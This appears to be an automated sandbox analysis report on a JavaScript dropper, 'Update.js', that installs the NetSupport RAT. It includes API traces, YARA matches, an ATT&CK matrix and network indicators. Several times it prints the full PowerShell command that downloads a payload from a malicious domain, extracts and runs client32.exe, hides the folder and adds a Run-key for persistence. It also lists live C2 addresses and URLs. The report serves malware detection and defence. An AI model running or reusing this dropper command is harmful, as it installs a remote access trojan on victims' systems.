                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,10_2_110B7F30
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,10_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,10_2_1117D104
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,10_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,10_2_11031780
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_1116EC49

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 77.83.199.112 443Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,10_2_110F4990
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11113190 GetKeyState,DeviceIoControl,keybd_event,10_2_11113190
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe "C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $vwkxivyiuk='https://ggoryo.com/trade/da.php?9800';$qbosaxlnlpu=(new-object system.net.webclient).downloadstring($vwkxivyiuk);$zrpu=[system.convert]::frombase64string($qbosaxlnlpu);$asd = get-random -minimum -5 -maximum 12; $jdkprjil=[system.environment]::getfolderpath('applicationdata')+'\eqmiufuuucw'+$asd;if (!(test-path $jdkprjil -pathtype container)) { new-item -path $jdkprjil -itemtype directory };$p=join-path $jdkprjil 'cxcc.zip';[system.io.file]::writeallbytes($p,$zrpu);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$jdkprjil)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $jdkprjil 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $jdkprjil -force; $fd.attributes='hidden';$s=$jdkprjil+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='diwfe';$asdasd='string';new-itemproperty -path $k -name $v -value $s -propertytype $asdasd;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $vwkxivyiuk='https://ggoryo.com/trade/da.php?9800';$qbosaxlnlpu=(new-object system.net.webclient).downloadstring($vwkxivyiuk);$zrpu=[system.convert]::frombase64string($qbosaxlnlpu);$asd = get-random -minimum -5 -maximum 12; $jdkprjil=[system.environment]::getfolderpath('applicationdata')+'\eqmiufuuucw'+$asd;if (!(test-path $jdkprjil -pathtype container)) { new-item -path $jdkprjil -itemtype directory };$p=join-path $jdkprjil 'cxcc.zip';[system.io.file]::writeallbytes($p,$zrpu);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$jdkprjil)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $jdkprjil 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $jdkprjil -force; $fd.attributes='hidden';$s=$jdkprjil+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='diwfe';$asdasd='string';new-itemproperty -path $k -name $v -value $s -propertytype $asdasd;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,10_2_1109E5B0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,10_2_1109ED30
                                Source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drBinary or memory string: Shell_TrayWnd
                                Source: client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drBinary or memory string: Progman
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,10_2_11174898
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,10_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: GetLocaleInfoA,10_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,10_2_11174796
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,10_2_1117483D
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_11174B90
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,10_2_11174A69
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,10_2_110F37A0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,10_2_11134830
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11147160 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,10_2_11147160
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,10_2_1117594C
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,10_2_11145C70
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,10_2_11070430
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_6CA8A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,10_2_6CA8A980
                                Source: Yara matchFile source: 10.2.client32.exe.747f0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.0.client32.exe.440000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.client32.exe.73a80000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.client32.exe.111b8c68.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.client32.exe.6ca80000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.powershell.exe.26c00bcaaf0.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.powershell.exe.26c00bc08a0.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.powershell.exe.26c00ba9ff8.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.2505080118.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6704, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4108, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information12
                                Scripting                                		2
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		12
                                Scripting                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Input Capture                                		12
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API                                		1
                                DLL Side-Loading                                		2
                                Valid Accounts                                		4
                                Obfuscated Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		21
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution                                		2
                                Valid Accounts                                		21
                                Access Token Manipulation                                		11
                                Software Packing                                		Security Account Manager3
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		3
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Command and Scripting Interpreter                                		1
                                Windows Service                                		1
                                Windows Service                                		1
                                DLL Side-Loading                                		NTDS34
                                System Information Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		14
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts2
                                Service Execution                                		1
                                Registry Run Keys / Startup Folder                                		113
                                Process Injection                                		1
                                Masquerading                                		LSA Secrets251
                                Security Software Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable Media3
                                PowerShell                                		RC Scripts1
                                Registry Run Keys / Startup Folder                                		2
                                Valid Accounts                                		Cached Domain Credentials2
                                Process Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                                Virtualization/Sandbox Evasion                                		DCSync31
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                                Access Token Manipulation                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt113
                                Process Injection                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529030 Sample: Update.js Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 34 ggoryo.com 2->34 36 geo.netsupportsoftware.com 2->36 48 Suricata IDS alerts for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Sigma detected: Powershell drops NetSupport RAT client 2->52 54 6 other signatures 2->54 8 wscript.exe 1 7 2->8         started        signatures3 process4 dnsIp5 38 ggoryo.com 77.83.199.112, 443, 49705, 49707 ASN-MOLMoscowRussiaRU Lithuania 8->38 56 System process connects to network (likely due to code injection or exploit) 8->56 58 Suspicious powershell command line found 8->58 60 Wscript starts Powershell (via cmd or directly) 8->60 62 2 other signatures 8->62 12 powershell.exe 15 35 8->12         started        signatures6 process7 file8 22 C:\Users\user\AppData\...\remcmdstub.exe, PE32 12->22 dropped 24 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 12->24 dropped 26 C:\Users\user\AppData\...\client32.exe, PE32 12->26 dropped 28 6 other files (5 malicious) 12->28 dropped 64 Found suspicious powershell code related to unpacking or dynamic code loading 12->64 66 Powershell drops PE file 12->66 16 client32.exe 16 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 30 5.181.159.137, 443, 49708 MIVOCLOUDMD Moldova Republic of 16->30 32 geo.netsupportsoftware.com 104.26.1.231, 49709, 80 CLOUDFLARENETUS United States 16->32 40 Multi AV Scanner detection for dropped file 16->40 42 Contains functionalty to change the wallpaper 16->42 44 Delayed program exit found 16->44 46 Contains functionality to detect sleep reduction / modifications 16->46 signatures12

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                No Antivirus matches

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL13%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL5%ReversingLabs
                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL17%ReversingLabs
                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL6%ReversingLabs
                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe27%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll0%ReversingLabs
                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll3%ReversingLabs
                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe24%ReversingLabsWin32.Trojan.Generic

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://nuget.org/NuGet.exe0%URL Reputationsafe
                                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                https://go.micro0%URL Reputationsafe
                                http://ocsp.thawte.com00%URL Reputationsafe
                                https://contoso.com/License0%URL Reputationsafe
                                https://contoso.com/Icon0%URL Reputationsafe
                                http://www.symauth.com/cps0(0%URL Reputationsafe
                                http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
                                http://www.symauth.com/rpa000%URL Reputationsafe
                                https://contoso.com/0%URL Reputationsafe
                                https://nuget.org/nuget.exe0%URL Reputationsafe
                                https://aka.ms/pscore680%URL Reputationsafe
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                https://oneget.org0%URL Reputationsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                		104.26.1.231
                                		truefalse
                                  		unknown
                                  ggoryo.com
                                  		77.83.199.112
                                  		truetrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://geo.netsupportsoftware.com/location/loca.aspfalse
                                      		unknown
                                      http://5.181.159.137/fakeurl.htmtrue
                                        		unknown
                                        https://ggoryo.com/trade/da.php?9800true
                                          		unknown
                                          https://ggoryo.com/trade/fix.php?6867true
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://www.google.com/intl/en-US/chrome/blank.htmlXwscript.exe, 00000000.00000003.1253318916.000001FC539D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://www.netsupportsoftware.compowershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.drfalse
                                                		unknown
